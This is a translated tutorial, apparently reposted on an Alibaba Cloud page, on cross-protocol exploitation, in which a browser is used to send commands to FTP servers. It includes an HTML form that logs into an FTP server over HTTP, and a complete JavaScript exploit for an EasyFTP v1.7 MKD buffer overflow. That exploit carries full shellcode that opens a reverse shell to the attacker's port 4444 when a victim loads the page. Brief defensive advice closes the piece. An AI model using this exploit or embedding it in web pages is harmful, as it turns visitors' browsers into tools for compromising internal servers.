Cross-Protocol Communication Technology exploitation and defense

Source: Internet
Author: User
Tags ftp commands

What is cross-protocol communication?

The cross-Protocol Communication Technology (Inter-Protocol Communication) refers to the technology in which two different protocols can exchange commands and data. One is called the target protocol and the other is called the carrier protocol. The target protocol is the Protocol we finally want to communicate with, and the carrier protocol is used to encapsulate the commands and data we finally want to send.

There are two necessary conditions for this type of communication to be completed:

1. The target protocol must have better fault tolerance. This is because we transmit instructions through a carrier protocol, which may be doped with commands that cannot be identified by the target protocol.

2. The carrier protocol can encapsulate the instructions of the target protocol. Even if the target Protocol cannot identify all encapsulated commands, it must be able to identify the final part of the commands.

How to use cross-Protocol Communication

Cross-Protocol Vulnerability exploitation (Inter-Protocol Expoitation) is a service that uses one Protocol to attack and run another Protocol.

When the carrier protocol is HTTP, attackers can launch attacks through browsers. This type of attack allows attackers to access resources and services that are only accessible to victims (such as services that are not open to the Internet through the Intranet ). In this process, the victim acts as a zombie and receives and executes risky code.

Some protocols that use line breaks as command delimiters, such as SMTP, POP3, IRC, and FTP are all affected by this attack. this is because when the target Protocol processes multiple rows of data, one row is processed separately. these protocols have better fault tolerance. this makes these protocols ignore unrecognized lines and only execute identifiable code.

To better understand cross-Protocol Communication, let's look at a simple example.

Example 1: connect to the FTP server over HTTP

It is very easy to connect to the ftp server through a browser, just an http post request. The following is the code for connecting to the local FTP server.

 
 
  1. <form method='POST' action='http://localhost:21' enctype='multipart/form-data'> 
  2. <input type='hidden' name='a' value='user secforce'> 
  3. <input type='hidden' name='a' value='pass secforce'> 
  4. <input type='submit'> 
  5. </form> 

If the FTP User Password exists, submit this form to log on to the FTP server. Is it very simple.

The specific POST request packet is as follows:

POST / HTTP/1.1Host: 127.0.0.1:21User-Agent: Mozilla/5.0 (X11; Debian; Linux x86_32; rv:16.0) Gecko/20110007 Firefox/20.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------63079936718166855021600323653Content-Length: 304 -----------------------------63079936718166855021600323653Content-Disposition: form-data; name="a" user secforce-----------------------------63079936718166855021600323653Content-Disposition: form-data; name="a" pass secforce-----------------------------63079936718166855021600323653--

The returned data is as follows. All 50X errors correspond to the HTTP lines that cannot be recognized by the server. The FTP server ignores them and executes the identifiable commands.

220--------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-Local time is now 12:41. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.530 You aren't logged in500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?331 User secforce OK. Password required500 ?500 ?500 ?230 OK. Current directory is /500 ?

If you test it yourself, you may find that not all FTP commands work properly. like MKD/RMD and DEL, GET/PUT, RETR/STOR cannot work normally. this is because FTP is an out-of-band protocol, and its data and control commands are transmitted through different TCP ports. in fact, if you try to use the STOR command to upload a file to the server, you will find that an empty file with the same name is created on the server. this is because an empty file is created before the file starts to transmit data. All commands can work without a separate data connection.

Let's look at a more interesting example.

Example 2: reverse shell over HTTP Overflow

In this example, EasyFTP v1.7 is used. This version has the buffer overflow vulnerability of the MKD Command. note that this command can be successfully executed without an additional data connection channel. we set up the server (192.168.1.10) in the virtual machine to create the "anonymous" user. the prerequisite for successful exploitation of this vulnerability is to log on to the FTP server first.

Because there is no need to duplicate the wheel, here we use a public vulnerability exploitation code (refer to [1]) to construct a POST request. this time, we use javascript to send shellcode to the FTP server. to successfully send the shellcode, we use the sendAsBinary function.

The final function is as follows:

function exploit(){var url = 'http://192.168.1.10:21'var intro = 'USER anonymous\r\nPASS anonymous\r\n'var payload = 'MKD \x89\xe7\x81\xef\x10\xfe\xff\xff\xc7\x07\x13\x57\x7e\xd6\x81\xc7\x14\xff\xff\xff\xff\xe7\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\xba\xae\x16\xd0\x74\xd9\xcc\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x4c\xe3\x2c\x9c\x19\x0c\xcd\x5d\x79\x84\x28\x6c\xab\xf2\x39\xdd\x7b\x70\x6f\xee\xf0\xd4\x84\x65\x74\xf1\xab\xce\x32\x27\x85\xcf\xf3\xe7\x49\x13\x92\x9b\x93\x40\x74\xa5\x5b\x95\x75\xe2\x86\x56\x27\xbb\xcd\xc5\xd7\xc8\x90\xd5\xd6\x1e\x9f\x66\xa0\x1b\x60\x12\x1a\x25\xb1\x8b\x11\x6d\x29\xa7\x7d\x4e\x48\x64\x9e\xb2\x03\x01\x54\x40\x92\xc3\xa5\xa9\xa4\x2b\x69\x94\x08\xa6\x70\xd0\xaf\x59\x07\x2a\xcc\xe4\x1f\xe9\xae\x32\xaa\xec\x09\xb0\x0c\xd5\xa8\x15\xca\x9e\xa7\xd2\x99\xf9\xab\xe5\x4e\x72\xd7\x6e\x71\x55\x51\x34\x55\x71\x39\xee\xf4\x20\xe7\x41\x09\x32\x4f\x3d\xaf\x38\x62\x2a\xc9\x62\xeb\x9f\xe7\x9c\xeb\xb7\x70\xee\xd9\x18\x2a\x78\x52\xd0\xf4\x7f\x95\xcb\x40\xef\x68\xf4\xb0\x39\xaf\xa0\xe0\x51\x06\xc9\x6b\xa2\xa7\x1c\x3b\xf2\x07\xcf\xfb\xa2\xe7\xbf\x93\xa8\xe7\xe0\x83\xd2\x2d\x97\x84\x45\x62\xb8\x1a\x92\x12\xbb\x1a\x8b\xbe\x32\xfc\xc1\x2e\xec\x41\x40\x00\x3e\x23\x1f\x17\x95\xa3\xbc\x8a\x72\x33\xca\xb6\x2c\x64\x9b\x09\x25\xe0\x31\x33\x9f\x16\xc8\xa5\xd8\x92\x17\x16\xe6\x1b\xd5\x22\xcc\x0b\x23\xaa\x48\x7f\xfb\xfd\x06\x29\xbd\x57\xe9\x83\x17\x0b\xa3\x43\xe1\x67\x74\x15\xee\xad\x02\xf9\x5f\x18\x53\x06\x6f\xcc\x53\x7f\x8d\x6c\x9b\xaa\x15\x8c\x7e\x7e\x60\x25\x27\xeb\xc9\x28\xd8\xc6\x0e\x55\x5b\xe2\xee\xa2\x43\x87\xeb\xef\xc3\x74\x86\x60\xa6\x7a\x35\x80\xe3'var req = new XMLHttpRequest();req.open('POST', url, true);req.setRequestHeader('Content-Type', 'text/plain');req.setRequestHeader('Content-Length', '20');req.sendAsBinary(intro + payload + '\r\n'); // neat way to send hexadecimal code through HTTP}

Here, payload chooses to bounce shell to port 4444 on our host. Then we use nc to listen. When we access the webpage embedded with the above js code in the browser, a miracle has occurred.

How to defend against attacks

1. blocked port. by default, most browsers refuse to connect to some famous ports, such as 21/FTP, 25/SMTP. this protection method can be achieved by modifying the browser configuration or using a non-standard port.

2. less fault tolerance. some protocols close the connection when they receive unrecognized commands. this reduces flexibility but enhances the ability to defend against cross-protocol attacks. A better way is to close the connection after receiving unrecognized commands consecutively.

Conclusion

As mentioned above, there are many restrictions on such attacks. generally, there are many better ways to achieve the same result than cross-protocol attacks. however, in a specific environment, this type of attack is a very effective method.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.